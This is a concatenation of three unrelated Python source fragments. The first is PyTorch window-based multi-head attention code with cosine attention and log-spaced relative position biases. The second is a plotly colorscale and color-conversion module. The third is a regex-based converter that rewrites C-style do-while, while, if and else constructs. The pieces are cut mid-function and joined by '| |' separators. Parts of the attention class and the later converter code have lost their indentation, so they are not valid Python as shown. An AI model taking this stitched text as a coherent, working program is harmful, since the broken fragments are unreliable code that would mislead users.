    """
    channels = input.shape[1]
    # Cut the width (dim 3) and then the height (dim 2) into window-sized
    # strips; result: [batch, channels, h/ws, w/ws, ws (width), ws (height)].
    windows: torch.Tensor = input.unfold(dimension=3, size=window_size, step=window_size)
    windows = windows.unfold(dimension=2, size=window_size, step=window_size)
    # Bring the window grid to the front and restore (height, width) order
    # inside each window, then flatten the grid into the batch axis.
    windows = windows.permute(0, 2, 3, 1, 5, 4)
    return windows.reshape(-1, channels, window_size, window_size)
def fold(input: torch.Tensor,
         window_size: int,
         height: int,
         width: int) -> torch.Tensor:
    """
    Stitches a batch of windows back into a 4D feature map (inverse of unfold).
    :param input: (torch.Tensor) Input tensor of windows [batch size * windows, channels, window size, window size]
    :param window_size: (int) Window size to be reversed
    :param height: (int) Height of the feature map
    :param width: (int) Width of the feature map
    :return: (torch.Tensor) Folded output tensor of the shape [batch size, channels, height, width]
    """
    channels = input.shape[1]
    # Windows per image = (height / ws) * (width / ws); recover batch size.
    batch_size = int(input.shape[0] // (height * width // window_size // window_size))
    # Re-expose the window grid, then interleave grid and in-window axes so
    # the reshape reassembles contiguous rows and columns.
    grid: torch.Tensor = input.view(batch_size, height // window_size, width // window_size, channels,
                                    window_size, window_size)
    merged: torch.Tensor = grid.permute(0, 3, 1, 4, 2, 5)
    return merged.reshape(batch_size, channels, height, width)
class WindowMultiHeadAttention(nn.Module):
"""
This class implements window-based Multi-Head-Attention.
"""
def __init__(self,
             in_features: int,
             window_size: int,
             number_of_heads: int,
             dropout_attention: float = 0.,
             dropout_projection: float = 0.,
             meta_network_hidden_features: int = 256,
             sequential_self_attention: bool = False) -> None:
    """
    Constructor method
    :param in_features: (int) Number of input features
    :param window_size: (int) Window size
    :param number_of_heads: (int) Number of attention heads
    :param dropout_attention: (float) Dropout rate of attention map
    :param dropout_projection: (float) Dropout rate after projection
    :param meta_network_hidden_features: (int) Number of hidden features in the two layer MLP meta network
    :param sequential_self_attention: (bool) If true sequential self-attention is performed
    """
    # Call super constructor
    super(WindowMultiHeadAttention, self).__init__()
    # Check parameter: each head gets in_features // number_of_heads channels
    assert (in_features % number_of_heads) == 0, \
        "The number of input features (in_features) are not divisible by the number of heads (number_of_heads)."
    # Save parameters
    self.in_features: int = in_features
    self.window_size: int = window_size
    self.number_of_heads: int = number_of_heads
    self.sequential_self_attention: bool = sequential_self_attention
    # Init query, key and value mapping as a single layer
    self.mapping_qkv: nn.Module = nn.Linear(in_features=in_features, out_features=in_features * 3, bias=True)
    # Init attention dropout
    self.attention_dropout: nn.Module = nn.Dropout(dropout_attention)
    # Init projection mapping
    self.projection: nn.Module = nn.Linear(in_features=in_features, out_features=in_features, bias=True)
    # Init projection dropout
    self.projection_dropout: nn.Module = nn.Dropout(dropout_projection)
    # Init meta network for positional encodings: a two-layer MLP mapping a
    # 2D (log-spaced) relative coordinate to one bias value per head
    self.meta_network: nn.Module = nn.Sequential(
        nn.Linear(in_features=2, out_features=meta_network_hidden_features, bias=True),
        nn.ReLU(inplace=True),
        nn.Linear(in_features=meta_network_hidden_features, out_features=number_of_heads, bias=True))
    # Init pair-wise relative positions (log-spaced)
    self.__make_pair_wise_relative_positions()
    # Init tau: learnable per-head temperature dividing the cosine
    # attention map (clamped to >= 0.01 at use sites)
    self.register_parameter("tau", torch.nn.Parameter(torch.ones(1, number_of_heads, 1, 1)))
def __make_pair_wise_relative_positions(self) -> None:
    """
    Method initializes the pair-wise relative positions to compute the positional biases
    """
    # All coordinates inside one window, flattened to [2, window_size ** 2]
    indexes: torch.Tensor = torch.arange(self.window_size)
    coordinates: torch.Tensor = torch.stack(torch.meshgrid([indexes, indexes]), dim=0)
    coordinates: torch.Tensor = torch.flatten(coordinates, start_dim=1)
    # Pair-wise differences: [2, tokens, tokens] -> [tokens * tokens, 2]
    relative_coordinates: torch.Tensor = coordinates[:, :, None] - coordinates[:, None, :]
    relative_coordinates: torch.Tensor = relative_coordinates.permute(1, 2, 0).reshape(-1, 2).float()
    # Log-spaced signed coordinates: sign(x) * log(1 + |x|)
    relative_coordinates_log: torch.Tensor = torch.sign(relative_coordinates) \
        * torch.log(1. + relative_coordinates.abs())
    # Registered as a buffer: follows .to()/.cuda() but is not trained
    self.register_buffer("relative_coordinates_log", relative_coordinates_log)
def update_resolution(self, new_window_size: int, **kwargs: Any) -> None:
    """
    Method updates the window size and so the pair-wise relative positions
    :param new_window_size: (int) New window size
    :param kwargs: (Any) Unused
    """
    # Set new window size
    self.window_size: int = new_window_size
    # Make new pair-wise relative positions; the meta network takes one
    # coordinate pair at a time, so no weights need to change.
    self.__make_pair_wise_relative_positions()
def __get_relative_positional_encodings(self) -> torch.Tensor:
    """
    Method computes the relative positional encodings
    :return: (torch.Tensor) Relative positional encodings [1, number of heads, window size ** 2, window size ** 2]
    """
    # Map every log-spaced coordinate pair to one bias value per head
    relative_position_bias: torch.Tensor = self.meta_network(self.relative_coordinates_log)
    # [pairs, heads] -> [heads, pairs]
    relative_position_bias: torch.Tensor = relative_position_bias.permute(1, 0)
    # [heads, tokens, tokens] with tokens = window_size ** 2
    relative_position_bias: torch.Tensor = relative_position_bias.reshape(self.number_of_heads,
                                                                          self.window_size * self.window_size,
                                                                          self.window_size * self.window_size)
    # Leading singleton dim broadcasts over the (batch * windows) axis
    return relative_position_bias.unsqueeze(0)
def __self_attention(self,
                     query: torch.Tensor,
                     key: torch.Tensor,
                     value: torch.Tensor,
                     batch_size_windows: int,
                     tokens: int,
                     mask: Optional[torch.Tensor] = None) -> torch.Tensor:
    """
    This function performs standard (non-sequential) scaled cosine self-attention
    :param query: (torch.Tensor) Query tensor of the shape [batch size * windows, heads, tokens, channels // heads]
    :param key: (torch.Tensor) Key tensor of the shape [batch size * windows, heads, tokens, channels // heads]
    :param value: (torch.Tensor) Value tensor of the shape [batch size * windows, heads, tokens, channels // heads]
    :param batch_size_windows: (int) Size of the first dimension of the input tensor (batch size * windows)
    :param tokens: (int) Number of tokens in the input
    :param mask: (Optional[torch.Tensor]) Attention mask for the shift case
    :return: (torch.Tensor) Output feature map of the shape [batch size * windows, tokens, channels]
    """
    # Compute attention map with scaled cosine attention: dot products are
    # normalized by the product of the query/key norms (floored at 1e-06 to
    # avoid division by zero), i.e. pair-wise cosine similarity
    attention_map: torch.Tensor = torch.einsum("bhqd, bhkd -> bhqk", query, key) \
        / torch.maximum(torch.norm(query, dim=-1, keepdim=True)
                        * torch.norm(key, dim=-1, keepdim=True),
                        torch.tensor(1e-06, device=query.device, dtype=query.dtype))
    # Divide by the learnable per-head temperature tau (clamped to >= 0.01)
    attention_map: torch.Tensor = attention_map / self.tau.clamp(min=0.01)
    # Apply relative positional encodings
    attention_map: torch.Tensor = attention_map + self.__get_relative_positional_encodings()
    # Apply mask if utilized: expose the windows axis so the per-window mask
    # broadcasts over batch and heads, then flatten back
    if mask is not None:
        number_of_windows: int = mask.shape[0]
        attention_map: torch.Tensor = attention_map.view(batch_size_windows // number_of_windows, number_of_windows,
                                                         self.number_of_heads, tokens, tokens)
        attention_map: torch.Tensor = attention_map + mask.unsqueeze(1).unsqueeze(0)
        attention_map: torch.Tensor = attention_map.view(-1, self.number_of_heads, tokens, tokens)
    attention_map: torch.Tensor = attention_map.softmax(dim=-1)
    # Perform attention dropout
    attention_map: torch.Tensor = self.attention_dropout(attention_map)
    # Apply attention map to values and merge the head axis back into channels
    output: torch.Tensor = torch.einsum("bhal, bhlv -> bhav", attention_map, value)
    output: torch.Tensor = output.permute(0, 2, 1, 3).reshape(batch_size_windows, tokens, -1)
    return output
def __sequential_self_attention(self,
query: torch.Tensor,
key: torch.Tensor,
value: torch.Tensor,
batch_size_windows: int,
tokens: int,
mask: Optional[torch.Tensor] = None) -> torch.Tensor:
"""
This function performs sequential scaled cosine self-attention
:param query: (torch.Tensor) Query tensor of the shape [batch size * windows, heads, tokens, channels // heads]
:param key: (torch.Tensor) Key tensor of the shape [batch size * windows, heads, tokens, channels // heads]
:param value: (torch.Tensor) Value tensor of the shape [batch size * windows, heads, tokens, channels // heads]
:param batch_size_windows: (int) Size of the first dimension of the input tensor (batch size * windows)
:param tokens: (int) Number of tokens in the input
:param mask: (Optional[torch.Tensor]) Attention mask for the shift case
:return: (torch.Tensor) Output feature map of the shape [batch size * windows, tokens, channels]
"""
# Init output tensor
output: torch.Tensor = torch.ones_like(query)
# Compute relative positional encodings fist
relative_position_bias: torch.Tensor = self.__get_relative_positional_encodings()
# Iterate over query and key tokens
for token_index_query in range(tokens):
# Compute attention map with scaled cosine attention
attention_map: torch.Tensor = \
torch.einsum("bhd, bhkd -> bhk", query[:, :, token_index_query], key) \
/ torch.maximum(torch.norm(query[:, :, token_index_query], dim=-1, keepdim=True)
* torch.norm(key, dim=-1, keepdim=False),
torch.tensor(1e-06, device=query.device, dtype=query.dtype))
attention_map: torch.Tensor = attention_map / self.tau.clamp(min=0.01)[..., 0]
# Apply positional encodings
attention_map: torch.Tensor = attention_map + relative_position_bias[..., token_index_query, :]
# Apply mask if utilized
if mask is not None:
| |
<filename>LDDMM_Python/lddmm_python/lib/plotly/colors.py
"""
colors
=====
Functions that manipulate colors and arrays of colors
There are three basic color types: rgb, hex and tuple:
rgb - An rgb color is a string of the form 'rgb(a,b,c)' where a, b and c are
floats between 0 and 255 inclusive.
hex - A hex color is a string of the form '#xxxxxx' where each x is a
character that belongs to the set [0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f]. This is
just the list of characters used in the hexadecimal numeric system.
tuple - A tuple color is a 3-tuple of the form (a,b,c) where a, b and c are
floats between 0 and 1 inclusive.
"""
from __future__ import absolute_import
from plotly import exceptions
from numbers import Number
DEFAULT_PLOTLY_COLORS = ['rgb(31, 119, 180)', 'rgb(255, 127, 14)',
'rgb(44, 160, 44)', 'rgb(214, 39, 40)',
'rgb(148, 103, 189)', 'rgb(140, 86, 75)',
'rgb(227, 119, 194)', 'rgb(127, 127, 127)',
'rgb(188, 189, 34)', 'rgb(23, 190, 207)']
PLOTLY_SCALES = {
'Greys': [
[0, 'rgb(0,0,0)'], [1, 'rgb(255,255,255)']
],
'YlGnBu': [
[0, 'rgb(8,29,88)'], [0.125, 'rgb(37,52,148)'],
[0.25, 'rgb(34,94,168)'], [0.375, 'rgb(29,145,192)'],
[0.5, 'rgb(65,182,196)'], [0.625, 'rgb(127,205,187)'],
[0.75, 'rgb(199,233,180)'], [0.875, 'rgb(237,248,217)'],
[1, 'rgb(255,255,217)']
],
'Greens': [
[0, 'rgb(0,68,27)'], [0.125, 'rgb(0,109,44)'],
[0.25, 'rgb(35,139,69)'], [0.375, 'rgb(65,171,93)'],
[0.5, 'rgb(116,196,118)'], [0.625, 'rgb(161,217,155)'],
[0.75, 'rgb(199,233,192)'], [0.875, 'rgb(229,245,224)'],
[1, 'rgb(247,252,245)']
],
'YlOrRd': [
[0, 'rgb(128,0,38)'], [0.125, 'rgb(189,0,38)'],
[0.25, 'rgb(227,26,28)'], [0.375, 'rgb(252,78,42)'],
[0.5, 'rgb(253,141,60)'], [0.625, 'rgb(254,178,76)'],
[0.75, 'rgb(254,217,118)'], [0.875, 'rgb(255,237,160)'],
[1, 'rgb(255,255,204)']
],
'Bluered': [
[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']
],
# modified RdBu based on
# www.sandia.gov/~kmorel/documents/ColorMaps/ColorMapsExpanded.pdf
'RdBu': [
[0, 'rgb(5,10,172)'], [0.35, 'rgb(106,137,247)'],
[0.5, 'rgb(190,190,190)'], [0.6, 'rgb(220,170,132)'],
[0.7, 'rgb(230,145,90)'], [1, 'rgb(178,10,28)']
],
# Scale for non-negative numeric values
'Reds': [
[0, 'rgb(220,220,220)'], [0.2, 'rgb(245,195,157)'],
[0.4, 'rgb(245,160,105)'], [1, 'rgb(178,10,28)']
],
# Scale for non-positive numeric values
'Blues': [
[0, 'rgb(5,10,172)'], [0.35, 'rgb(40,60,190)'],
[0.5, 'rgb(70,100,245)'], [0.6, 'rgb(90,120,245)'],
[0.7, 'rgb(106,137,247)'], [1, 'rgb(220,220,220)']
],
'Picnic': [
[0, 'rgb(0,0,255)'], [0.1, 'rgb(51,153,255)'],
[0.2, 'rgb(102,204,255)'], [0.3, 'rgb(153,204,255)'],
[0.4, 'rgb(204,204,255)'], [0.5, 'rgb(255,255,255)'],
[0.6, 'rgb(255,204,255)'], [0.7, 'rgb(255,153,255)'],
[0.8, 'rgb(255,102,204)'], [0.9, 'rgb(255,102,102)'],
[1, 'rgb(255,0,0)']
],
'Rainbow': [
[0, 'rgb(150,0,90)'], [0.125, 'rgb(0,0,200)'],
[0.25, 'rgb(0,25,255)'], [0.375, 'rgb(0,152,255)'],
[0.5, 'rgb(44,255,150)'], [0.625, 'rgb(151,255,0)'],
[0.75, 'rgb(255,234,0)'], [0.875, 'rgb(255,111,0)'],
[1, 'rgb(255,0,0)']
],
'Portland': [
[0, 'rgb(12,51,131)'], [0.25, 'rgb(10,136,186)'],
[0.5, 'rgb(242,211,56)'], [0.75, 'rgb(242,143,56)'],
[1, 'rgb(217,30,30)']
],
'Jet': [
[0, 'rgb(0,0,131)'], [0.125, 'rgb(0,60,170)'],
[0.375, 'rgb(5,255,255)'], [0.625, 'rgb(255,255,0)'],
[0.875, 'rgb(250,0,0)'], [1, 'rgb(128,0,0)']
],
'Hot': [
[0, 'rgb(0,0,0)'], [0.3, 'rgb(230,0,0)'],
[0.6, 'rgb(255,210,0)'], [1, 'rgb(255,255,255)']
],
'Blackbody': [
[0, 'rgb(0,0,0)'], [0.2, 'rgb(230,0,0)'],
[0.4, 'rgb(230,210,0)'], [0.7, 'rgb(255,255,255)'],
[1, 'rgb(160,200,255)']
],
'Earth': [
[0, 'rgb(0,0,130)'], [0.1, 'rgb(0,180,180)'],
[0.2, 'rgb(40,210,40)'], [0.4, 'rgb(230,230,50)'],
[0.6, 'rgb(120,70,20)'], [1, 'rgb(255,255,255)']
],
'Electric': [
[0, 'rgb(0,0,0)'], [0.15, 'rgb(30,0,100)'],
[0.4, 'rgb(120,0,100)'], [0.6, 'rgb(160,90,0)'],
[0.8, 'rgb(230,200,0)'], [1, 'rgb(255,250,220)']
],
'Viridis': [
[0, '#440154'], [0.06274509803921569, '#48186a'],
[0.12549019607843137, '#472d7b'], [0.18823529411764706, '#424086'],
[0.25098039215686274, '#3b528b'], [0.3137254901960784, '#33638d'],
[0.3764705882352941, '#2c728e'], [0.4392156862745098, '#26828e'],
[0.5019607843137255, '#21918c'], [0.5647058823529412, '#1fa088'],
[0.6274509803921569, '#28ae80'], [0.6901960784313725, '#3fbc73'],
[0.7529411764705882, '#5ec962'], [0.8156862745098039, '#84d44b'],
[0.8784313725490196, '#addc30'], [0.9411764705882353, '#d8e219'],
[1, '#fde725']
]
}
def color_parser(colors, function):
    """
    Apply *function* to a single color or to every color in an iterable.

    A plain string (rgb/hex) or a tuple of numbers counts as one color;
    any other iterable is mapped element-wise, preserving its tuple/list
    container type.  All items must share one representation.
    """
    if isinstance(colors, str):
        return function(colors)
    if isinstance(colors, tuple) and isinstance(colors[0], Number):
        return function(colors)
    if hasattr(colors, '__iter__'):
        mapped = [function(item) for item in colors]
        return tuple(mapped) if isinstance(colors, tuple) else mapped
def validate_colors(colors):
    """
    Validate color(s); raise PlotlyError for anything malformed.

    Accepts a Plotly scale name, an rgb/hex string, a tuple of floats, or
    a list/dict of such colors.  Returns the input unchanged (None for a
    scale name) when everything checks out.
    """
    candidates = []
    if isinstance(colors, str):
        if colors in PLOTLY_SCALES:
            return
        if 'rgb' in colors or '#' in colors:
            candidates = [colors]
        else:
            raise exceptions.PlotlyError(
                "If your colors variable is a string, it must be a "
                "Plotly scale, an rgb color or a hex color."
            )
    elif isinstance(colors, tuple):
        candidates = [colors] if isinstance(colors[0], Number) else list(colors)
    if isinstance(colors, dict):
        candidates.extend(colors.values())
    elif isinstance(colors, list):
        candidates = colors
    for each_color in candidates:
        if 'rgb' in each_color:
            # rgb channel values must fit in 0-255
            rgb_tuple = color_parser(each_color, unlabel_rgb)
            for channel in rgb_tuple:
                if channel > 255.0:
                    raise exceptions.PlotlyError(
                        "Whoops! The elements in your rgb colors "
                        "tuples cannot exceed 255.0."
                    )
        elif '#' in each_color:
            # hex strings are validated by attempting the conversion
            color_parser(each_color, hex_to_rgb)
        elif isinstance(each_color, tuple):
            # tuple colors must fit in 0-1
            for channel in each_color:
                if channel > 1.0:
                    raise exceptions.PlotlyError(
                        "Whoops! The elements in your colors tuples "
                        "cannot exceed 1.0."
                    )
    return colors
def convert_colors_to_same_type(colors, colortype='rgb'):
    """
    Normalize color(s) to one representation ('rgb' or 'tuple').

    A Plotly scale name returns its colorscale unchanged (colortype does
    not apply in that case); otherwise every color is converted to the
    requested representation and returned in a list.
    """
    colors_list = []
    if isinstance(colors, str):
        if colors in PLOTLY_SCALES:
            return PLOTLY_SCALES[colors]
        if 'rgb' in colors or '#' in colors:
            colors_list = [colors]
        else:
            raise exceptions.PlotlyError(
                "If your colors variable is a string, it must be a Plotly "
                "scale, an rgb color or a hex color.")
    elif isinstance(colors, tuple):
        colors_list = [colors] if isinstance(colors[0], Number) else list(colors)
    elif isinstance(colors, list):
        colors_list = colors
    # First pass: everything becomes an 'rgb(...)' string (in place, so a
    # caller-supplied list is mutated exactly as before).
    for index, each_color in enumerate(colors_list):
        if '#' in each_color:
            as_tuple = color_parser(each_color, hex_to_rgb)
            colors_list[index] = color_parser(as_tuple, label_rgb)
        elif isinstance(each_color, tuple):
            scaled = color_parser(each_color, convert_to_RGB_255)
            colors_list[index] = color_parser(scaled, label_rgb)
    if colortype == 'rgb':
        return colors_list
    elif colortype == 'tuple':
        # Second pass: 'rgb(...)' strings back to 0-1 float tuples.
        for index, each_color in enumerate(colors_list):
            unlabelled = color_parser(each_color, unlabel_rgb)
            colors_list[index] = color_parser(unlabelled, unconvert_from_RGB_255)
        return colors_list
    raise exceptions.PlotlyError("You must select either rgb or tuple "
                                 "for your colortype variable.")
def convert_dict_colors_to_same_type(colors, colortype='rgb'):
    """
    Normalize every color in a dict to the requested color type.

    Values that are hex strings or float tuples are rewritten in place as
    'rgb(r, g, b)' labels, then the whole dict is returned either as rgb
    strings (colortype='rgb') or as float tuples (colortype='tuple').
    """
    # first pass: bring hex strings and float tuples to rgb-label form
    for name in colors:
        value = colors[name]
        if '#' in value:
            colors[name] = color_parser(
                color_parser(value, hex_to_rgb), label_rgb)
        elif isinstance(value, tuple):
            colors[name] = color_parser(
                color_parser(value, convert_to_RGB_255), label_rgb)

    if colortype == 'rgb':
        return colors
    if colortype == 'tuple':
        # second pass: unlabel and scale back down to 0-1 float tuples
        for name in colors:
            colors[name] = color_parser(
                color_parser(colors[name], unlabel_rgb),
                unconvert_from_RGB_255)
        return colors
    raise exceptions.PlotlyError("You must select either rgb or tuple "
                                 "for your colortype variable.")
def make_colorscale(colors, scale=None):
    """
    Makes a colorscale from a list of colors and a scale

    Takes a list of colors and scales and constructs a colorscale based
    on the colors in sequential order. If 'scale' is left empty, a
    linearly interpolated colorscale will be generated. If 'scale' is a
    specified list, it must be the same length as colors and must contain
    all floats.

    For documentation regarding to the form of the output, see
    https://plot.ly/python/reference/#mesh3d-colorscale

    :raises: (PlotlyError) if fewer than two colors are given, or if the
        scale does not match the colors in length or is not a strictly
        increasing sequence running from 0.0 to 1.0.
    """
    # validate minimum colors length of 2
    if len(colors) < 2:
        raise exceptions.PlotlyError("You must input a list of colors that "
                                     "has at least two colors.")

    if not scale:
        # no scale supplied: space the colors evenly over [0, 1]
        scale_incr = 1./(len(colors) - 1)
        return [[i * scale_incr, color] for i, color in enumerate(colors)]

    # validate scale
    if len(colors) != len(scale):
        raise exceptions.PlotlyError("The length of colors and scale "
                                     "must be the same.")

    if (scale[0] != 0) or (scale[-1] != 1):
        raise exceptions.PlotlyError(
            "The first and last number in scale must be 0.0 and 1.0 "
            "respectively."
        )

    for j in range(1, len(scale)):
        if scale[j] <= scale[j-1]:
            # note: a space was missing between "are" and "0.0" in the
            # original message ("...number are0.0...") - fixed here
            raise exceptions.PlotlyError(
                "'scale' must be a list that contains an increasing "
                "sequence of numbers where the first and last number are "
                "0.0 and 1.0 respectively."
            )

    return [list(tup) for tup in zip(scale, colors)]
def find_intermediate_color(lowcolor, highcolor, intermed):
"""
Returns the color at | |
' + pentadList[i].text #for lines that start directly with "do"
for j in range (len(pentadList[i].text)):
########### Variables ####################
#line = pentadList[i].text
presentChar = pentadList[i].text[j]
if(debugMode) : print("line = ", i, " | j =", j, " | len = ", len(pentadList[i].text), " | read : " , presentChar)
if (j < len(pentadList[i].text)-1) : firstChar = pentadList[i].text[j+1]
else: firstChar = None
if (j < len(pentadList[i].text)-2) : secondChar = pentadList[i].text[j+2]
else: secondChar = None
if (j < len(pentadList[i].text)-3) : thirdChar = pentadList[i].text[j+3]
else: thirdChar = None
##########################################
if(state == "Nothing" and re.search(r'(?:\W|\0|^|\s)', str(presentChar)) and firstChar == 'd' and secondChar == 'o' and (thirdChar == None or re.search(r'(\W)', str(thirdChar))!=None)):
if(debugMode) : print(re.search(r'\W|\0|$', str(thirdChar)))
state = "Before Loop"
doLine = i
doChar1 = j+1
doChar2 = j+2
if(debugMode) : print("DOWHILE printing --> ", "do found : line", doLine, ", Char ", doChar1)
elif(re.search(r'(?:\W|\0|^|\s)', str(presentChar)) and firstChar == 'd' and secondChar == 'o' and (thirdChar == None or re.search(r'(\W)', str(thirdChar))!=None)):
if(debugMode) : print("DOWHILE printing --> ", "another do found : line", i, ", Char ", j)
recursiveCase = True
if(state == "Before Loop" and bracketCounter == 0 and presentChar == '{'):
state = "Inside Loop"
if(debugMode) : print("DOWHILE printing --> ", state)
bracketCounter = 1
#opBracketLine = i
#opBracketChar = j
elif(state == "Inside Loop" and bracketCounter != 0 and presentChar == '{'):
bracketCounter = bracketCounter + 1
if(state == "Inside Loop" and bracketCounter == 1 and presentChar == '}'):
state = "After Loop"
if(debugMode) : print("DOWHILE printing --> ", state, " with end_bracket at line ", i, " and at char ", j)
bracketCounter = 0
endBracketLine = i
endBracketChar = j
elif(state == "Inside Loop" and bracketCounter != 1 and presentChar == '}'):
bracketCounter = bracketCounter - 1
if(state == "After Loop" and re.search(r'(?<=\W)while[\\\s]*?(\(.*?\)[\\\s]*?;)', pentadList[endBracketLine].text[endBracketChar:])):
state = "After condition"
doWhileConditionANDWhileKeywordMatch = re.search(r'(?<=\W|\0)(?P<all>while[\\\s]*?(?P<cond>\(.*?\))[\\\s]*?;)', pentadList[i].text[endBracketChar:])
doWhileCondition = doWhileConditionANDWhileKeywordMatch.group('cond')
doWhileConditionANDWhileKeyword = doWhileConditionANDWhileKeywordMatch.group('all')
doWhileConditionANDWhileKeywordLine = i
if(debugMode) : print("DOWHILE printing --> ", "Match :", doWhileCondition)
if(debugMode) : print("DOWHILE printing --> ", "That gonna be detroyed :", doWhileConditionANDWhileKeyword)
pentadList[i].text = pentadList[i].text[:endBracketChar] + pentadList[i].text[endBracketChar:].replace(doWhileConditionANDWhileKeyword, "", 1)
if(debugMode) : print("DOWHILE printing --> ", "After line :", pentadList[i].text)
pentadList[doLine].text = pentadList[doLine].text[ : doChar1] \
+ "for" + doWhileCondition \
+ pentadList[doLine].text[doChar2+1 : ]
pentadList[doWhileConditionANDWhileKeywordLine].addRole("while of do from line", str(doLine))
break
if(state == "After condition"):
recursiveCase = True #we run the function one more time since we didnt analyse the entire code yet
break
if(recursiveCase):
return doWhileConverter(pentadList, debugMode, executedManyTimes)
return spaceNormalizer(pentadList)
def whileLoopConverter(pentadList = [], debugMode = False):
    """The objective here is to convert while loops in for loops using regex."""
    # NOTE(review): the mutable default argument is kept for interface
    # compatibility; callers are expected to pass their own list.
    # a 'while' keyword preceded by a non-word char (or line start) and
    # followed by '(' / '\' / end-of-line becomes 'for'
    while_pattern = re.compile(r'(?P<char>\W|\0|^)while\s*(?=(\(|\\|\0|$))')
    if(debugMode) : print("")
    for idx in range(len(pentadList)):
        if(debugMode) : print("line = ", idx, " | len = ", len(pentadList[idx].text), " | read : ", pentadList[idx].text)
        guard = 0
        match = re.search(while_pattern, pentadList[idx].text)
        while match is not None:
            if(debugMode) : print("found : " + match.group('char') + "while")
            if(debugMode) : print("line before : ", pentadList[idx].text)
            # replace only the first occurrence, then rescan the line
            pentadList[idx].text = re.sub(while_pattern, match.group('char') + "for", pentadList[idx].text, 1)
            if(debugMode) : print("line after : ", pentadList[idx].text)
            match = re.search(while_pattern, pentadList[idx].text)
            guard = guard + 1
            if guard == 1000:
                break  # safety valve against a pathological line
    return spaceNormalizer(pentadList)
def ifNormalizer(pentadList = [], debugMode = False):
    """Wrap brace-less ``if`` bodies in braces.

    Rewrites every ``if (cond) instruction;`` found in the pentad texts as
    ``if (cond) { instruction; }`` so that later passes can assume braced
    blocks, then re-chops the lines on semicolons.

    NOTE(review): the original docstring claimed this converts do-while
    loops - that was a copy/paste from another pass; only ``if`` is touched.
    """
    if(debugMode) : print("\nIF printing --> ", "Starting")
    i = 0
    for i in range (len(pentadList)):
        # prepend a space so an 'if' at column 0 still has a \W before it
        pentadList[i].text = ' ' + pentadList[i].text #like always, it doesn't harm
        pattern = re.compile(r"""
                (?P<keyword> #########################################################
                (?:[\s]|[\\]|\0|^)+ # start of a keyword
                (?:if) # if
                (?:[\s]|[\\])* # 0 or more spaces
                )
                (?P<condition> #########################################################
                (?:\() # an open parenthesis
                (?:[\s]|[\\])* # 0 or more spaces
                (?:[^\)\(])*? # anything but a parenthesis or nothing
                (?:[\s]|[\\])* # 0 or more spaces
                (?: #----------------------
                (?:\() # # a parenthesis
                (?:[\s]|[\\])* # # 0 or more spaces
                (?:[^\)\(])*? # # anything but a parenthesis or nothing
                (?:[\s]|[\\])* # # 0 or more spaces
                (?:\)) # # a parenthesis
                )* #------ 0 or more -----
                (?:[\s]|[\\])* # 0 or more spaces
                (?:[^\)\(])*? # anything but a parenthesis or nothing
                (?:[\s]|[\\])* # 0 or more spaces
                (?:\)) # a close parenthesis
                )
                (?P<instruction> #########################################################
                (?:[\s]|[\\])* # 0 or more spaces
                (?:.)+? # anything but lazy
                (?:[\s]|[\\])* # 0 or more spaces
                )
                (?:;|$|\n|{) # a semicolon or the end of line
                """, re.VERBOSE)
        if(re.search(pattern, pentadList[i].text)):
            found = re.findall(pattern, pentadList[i].text)
            # h is a (keyword, condition, instruction) tuple per match
            # NOTE(review): re.sub below replaces EVERY match with THIS h's
            # text on each iteration; with several distinct ifs on one line
            # later iterations may no longer find their match - verify intent
            for h in found :
                if(debugMode) : print("\nIF printing --> ", "st before = ", pentadList[i].text)
                pentadList[i].text = re.sub(pattern, h[0] + h[1] + ' { '+ h[2] +'; } ', pentadList[i].text)
                if(debugMode) : print("\nIF printing --> ", "st after = ", pentadList[i].text)
    return semicolonBasedChopper(pentadList, debugMode)
def elseNormalizer(pentadList = [], debugMode = False, executedManyTimes = 0):
"""The objective here is to convert do-while loops in for loops using regex."""
executedManyTimes = executedManyTimes + 1
if(executedManyTimes == 30) : return []
presentChar = "//"
memory1 = "//"
memory2 = "//"
memory3 = "//"
memory4 = "//"
memory5 = "//"
mode = "nothing"
bracketCounter = 0
paranthesisCounter = 0
lastElseFound = 0
i = 0
j = 0
recursiveCase = False
elseExpected = False
doubt = "no doubt"
if(debugMode) : print("\nELSE printing --> ", "Starting")
while i < len(pentadList):
if(i > 1500): break #safety in case of BS
pentadList[i].text = ' ' + pentadList[i].text #for lines that start directly with "else"
pentadList[i].text = ' ' + pentadList[i].text.replace(" else{", " else {")
j = 0
while j < len(pentadList[i].text):
if(j > 1000): break #safety in case of BS
########### Variables ####################
#line = pentadList[i].text
memory1 = memory2
memory2 = memory3
memory3 = memory4
memory4 = memory5
memory5 = presentChar
presentChar = pentadList[i].text[j]
if(debugMode) : print("ELSE printing --> ", "line = ", i, "| read : " , presentChar, " | in memory : " , memory1, memory2, memory3, memory4, memory5)
########### Let's start ####################
if(mode == "nothing" or mode == "closingLastElse"):
if(presentChar == ' ' and memory1 == ' ' and memory2 == 'e' and memory3 == 'l' and memory4 == 's' and memory5 == 'e'):
if(mode == "nothing") :
mode = "readElse"
if(debugMode) : print("\nELSE printing --> ", "else detected : readElse mode activated !\n")
if(mode == "closingLastElse") :
mode = "readLastElse"
if(debugMode) : print("\nELSE printing --> ", "else detected : readLastElse mode activated !\n")
if(mode == "readElse" or mode == "readLastElse"):
if(presentChar != ' '):
if(debugMode) : print("\nELSE printing --> ", "A new char :", presentChar," has been read !")
if(presentChar == '{'):
if(debugMode) : print("\nELSE printing --> ", "Too bad... that's a brackety.")
if(mode == "readElse"):
mode = "readBracket"
if(debugMode) : print("\nELSE printing --> ", "readBracket mode activated !\n")
if(mode == "readLastElse") :
mode = "continuingInsideLastElse"
if(debugMode) : print("\nELSE printing --> ", "At this point, we already found an else, then checked if there was another one after that, then find the last one.")
if(debugMode) : print("\nELSE printing --> ", "And this else has an opening bracket. So we just need to wait until the closing one, and we're done !")
if(debugMode) : print("\nELSE printing --> ", "We just need to find the closing one and to add another closing bracket directly after it. That's all.")
if(debugMode) : print("\nELSE printing --> ", "continuingInsideLastElse mode activated !\n")
bracketCounter = 0
paranthesisCounter = 0
else:
if(mode == "readElse"):
mode = "somethingElseAfterElse"
if(debugMode) : print("\nELSE printing --> ", "somethingElseAfterElse mode activated !\n")
if(mode == "readLastElse"):
mode = "somethingAfterLastElse"
if(debugMode) : print("\nELSE printing --> ", "\nThat's a shame we can't take care of that now. We need to focus on closing the wrapping else.")
if(debugMode) : print("\nELSE printing --> ", "\nI guess we're good for another round once we're done.\n")
recursiveCase = True
if(debugMode) : print("\nELSE printing --> ", "somethingAfterLastElse mode activated !\n")
bracketCounter = 0
paranthesisCounter = 0
elif(mode == "readBracket"):
